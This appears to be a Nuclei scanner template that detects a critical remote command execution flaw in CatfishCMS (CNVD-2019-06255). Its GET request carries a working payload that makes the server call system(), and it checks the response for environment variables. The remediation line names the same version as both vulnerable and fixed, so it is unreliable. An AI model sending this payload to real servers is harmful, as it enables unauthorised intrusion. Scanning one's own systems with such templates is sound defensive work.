id: CNVD-2019-06255

info:
  name: CatfishCMS RCE
  author: Lark-Lab
  severity: critical
  description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
  remediation: Upgrade to CatfishCMS version 4.8.54 or later.
  reference:
    - https://its401.com/article/yun2diao/91344725
    - https://github.com/xwlrbh/Catfish/issues/4
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: rce,cnvd,catfishcms,cnvd2019

http:
  - method: GET
    path:
      - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'OS'
          - 'PATH'
          - 'SHELL'
          - 'USER'
        condition: and

# digest: 4a0a00473045022001f6790bc86951ffa950a8bfcc63a36b000f36b8c8c11daf9e03c936c09d84c0022100fead4a5a6ee2920ed15ab8a52ace2600ba56a0b8d888acec846dedcc8ee13908:922c64590222798bb761d5b6d8e72950
